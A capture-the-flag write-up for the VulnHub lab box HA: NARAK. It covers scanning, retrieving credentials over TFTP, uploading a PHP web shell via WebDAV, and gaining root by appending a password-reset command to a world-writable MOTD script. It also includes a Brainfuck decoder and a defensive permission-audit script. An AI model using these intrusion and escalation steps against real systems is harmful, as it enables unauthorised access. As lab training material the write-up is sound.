VulnHub HA: NARAK writeup

Download: https://www.vulnhub.com/entry/ha-narak,569/

flag1

Directory scan

❯ dirsearch -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -u http://192.168.231.22/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: 1.py | HTTP method: GET | Threads: 1 | Wordlist size: 8989

Output File: /usr/local/lib/python3.9/site-packages/dirsearch/reports/192.168.231.22/-_21-09-20_12-28-11.txt

Error Log: /usr/local/lib/python3.9/site-packages/dirsearch/logs/errors-21-09-20_12-28-11.log

Target: http://192.168.231.22/

[12:28:11] Starting:
[12:28:19] 301 - 317B - /images -> http://192.168.231.22/images/
[12:28:19] 200 - 4KB - /images/
[12:28:19] 200 - 3KB - /index.html
[12:28:23] 401 - 461B - /webdav/
[12:28:23] 401 - 461B - /webdav/index.html
[12:28:23] 401 - 461B - /webdav/servlet/webdav/

Visiting /webdav/ gives a login prompt, but we do not know the password.
According to other writeups online, scanning also turns up tips.txt, which contains the hint; an alternative is to generate a wordlist from the site with cewl and brute-force the login.

Hint to open the door of narak can be found in creds.txt.

A UDP port scan reveals a TFTP service; this scan is quite slow.

❯ nmap -sU 192.168.231.22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 12:42 CST
Nmap scan report for 192.168.231.22 (192.168.231.22)
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:02:7B:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1117.26 seconds

Download creds.txt over TFTP to get the credentials (the file is base64-encoded).

❯ tftp 192.168.231.22
tftp> get creds.txt
Received 22 bytes in 0.1 seconds
tftp> quit
❯ cat creds.txt
eWFtZG9vdDpTd2FyZw==
❯ echo "eWFtZG9vdDpTd2FyZw=="| base64 -D
yamdoot:Swarg%

Upload a shell with cadaver

❯ cadaver http://192.168.231.22/webdav/
Authentication required for webdav on server `192.168.231.22':
Username: yamdoot
Password:
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 35 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.231.22' closed.

Note: tools such as Caidao (China Chopper) and AntSword cannot be used to connect to the uploaded shell here; commands can only be executed through the web page, because besides the login authentication, the request header information changes with every command execution. Capture the traffic to see the details.
Looking around with the shell, we find /mnt/hell.sh:

#!/bin/bash
echo "Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

The last line is Brainfuck; decoding it gives chitragupt.
ls /home gives the usernames inferno, narak and yamdoot.
Try logging in with this password:
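To show what "Brainfuck decode" actually does, here is a small interpreter, added as an example and not part of the original writeup or the NARAK box. It implements standard Brainfuck semantics (8-bit wrapping cells, a 30000-cell tape); the first loop of the hell.sh program relies on the wrap-around, so an interpreter without it would fail. The script text below is copied from the writeup; `extract_brainfuck` and `run_brainfuck` are names chosen here.

```python
"""Decode the Brainfuck line found in /mnt/hell.sh (added example)."""

# Contents of /mnt/hell.sh as shown in the writeup.
HELL_SH = """#!/bin/bash
echo "Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
"""

# The eight Brainfuck commands; every other character is a comment.
BF_CHARS = set("<>+-.,[]")


def extract_brainfuck(script_text: str) -> str:
    """Return the lines of a file that consist only of Brainfuck commands."""
    lines = [ln.strip() for ln in script_text.splitlines()]
    return "".join(ln for ln in lines if ln and set(ln) <= BF_CHARS)


def _match_brackets(program: str) -> dict:
    """Map each '[' and ']' offset to its matching partner."""
    stack, pairs = [], {}
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return pairs


def run_brainfuck(program: str, tape_size: int = 30000, input_data: bytes = b"") -> str:
    """Execute a Brainfuck program and return its output as text.

    Cells are unsigned 8-bit and wrap on overflow/underflow: the hell.sh
    program starts with '--' on a zero cell, i.e. it counts on wrapping.
    """
    pairs = _match_brackets(program)
    tape = bytearray(tape_size)
    ptr = pc = 0
    out = bytearray()
    inp = iter(input_data)
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape overrun")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape underrun")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = pairs[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = pairs[pc]  # jump back to the loop start
        pc += 1
    return out.decode("latin-1")


def decode_hell_sh(script_text: str = HELL_SH) -> str:
    """Pull the Brainfuck line out of the script and run it."""
    return run_brainfuck(extract_brainfuck(script_text))


if __name__ == "__main__":
    print(decode_hell_sh())  # chitragupt
```

Running the file prints the recovered password; the same `run_brainfuck` works for any other Brainfuck payload dropped on a box, which is why the extraction step is kept separate from the interpreter.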

❯ ssh inferno@192.168.231.22
inferno@192.168.231.22's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Sep 19 22:47:00 2021 from 192.168.231.1
inferno@ubuntu:~$ ls
user.txt
inferno@ubuntu:~$ cat user.txt
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}

flag2

We find that the MOTD header script is readable and writable by everyone, so we escalate privileges through MOTD.

inferno@ubuntu:~$ ls -la /etc/update-motd.d/00-header
-rwxrwxrwx 1 root root 1254 Sep 19 22:50 /etc/update-motd.d/00-header
inferno@ubuntu:~$ echo "echo 'root:admin' | sudo chpasswd" >> /etc/update-motd.d/00-header
inferno@ubuntu:~$ cat /etc/update-motd.d/00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
# Fall back to using the very slow lsb_release utility
DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
echo 'root:admin' | sudo chpasswd
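The root cause above is a world-writable hook under /etc/update-motd.d, which pam_motd runs as root at every login. As an added, defender-side example (not part of the writeup), the following audit script lists hooks that a non-root user could modify or replace. The directory path and the expected owner uid are parameters so the check can be run against a constructed test tree; `build_demo_tree` creates such a tree with one 0777 hook mirroring the 00-header case on this box.

```python
"""Audit update-motd hooks for permissions that allow root escalation (added example)."""
import os
import stat
import sys
import tempfile
from pathlib import Path


def audit_motd_dir(motd_dir="/etc/update-motd.d", expected_owner_uid=0):
    """Return a list of (path, problem) tuples for the directory and its entries.

    Flags:
      * the directory or any entry owned by someone other than expected_owner_uid
        (a non-root owner can rewrite the hook at will),
      * group-writable or world-writable mode bits on the directory (new hooks
        can be dropped in) or on any entry (the -rwxrwxrwx 00-header case).
    """
    findings = []
    d = Path(motd_dir)
    if not d.is_dir():
        return findings
    for p in [d] + sorted(d.iterdir()):
        st = p.lstat()
        if expected_owner_uid is not None and st.st_uid != expected_owner_uid:
            findings.append((str(p), f"owned by uid {st.st_uid}, expected {expected_owner_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((str(p), "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((str(p), "world-writable"))
    return findings


def build_demo_tree():
    """Constructed sample tree: one world-writable hook and one sane hook."""
    base = Path(tempfile.mkdtemp(prefix="motd-audit-demo-"))
    d = base / "update-motd.d"
    d.mkdir()
    d.chmod(0o755)
    bad = d / "00-header"
    bad.write_text("#!/bin/sh\nprintf 'Welcome\\n'\n")
    bad.chmod(0o777)  # -rwxrwxrwx, as in the writeup's listing
    good = d / "10-help-text"
    good.write_text("#!/bin/sh\necho help\n")
    good.chmod(0o755)
    return str(d)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/update-motd.d"
    problems = audit_motd_dir(target)
    for path, why in problems:
        print(f"{path}: {why}")
    sys.exit(1 if problems else 0)
```

Run it with no argument on a live host, or point it at the output of `build_demo_tree()` to see the two findings for 00-header. The fix for a flagged hook is to restore root ownership and a 0755 mode, and to check what was appended to it.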

Log out and log in again so the MOTD hook runs at login and resets the root password, then use the new password to get root.

inferno@ubuntu:~$ exit
logout
Connection to 192.168.231.22 closed.
❯ ssh inferno@192.168.231.22
inferno@192.168.231.22's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Sep 19 22:47:21 2021 from 192.168.231.1
inferno@ubuntu:~$ sudo su
[sudo] password for inferno:
Sorry, try again.
[sudo] password for inferno:
sudo: 1 incorrect password attempt
inferno@ubuntu:~$ su root
Password:
root@ubuntu:/home/inferno# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████


Root Flag: {9440aee508b6215995219c58c8ba4b45}

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/hackinarticles

Jeenali Kothari : https://www.linkedin.com/in/jeenali-kothari/

+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________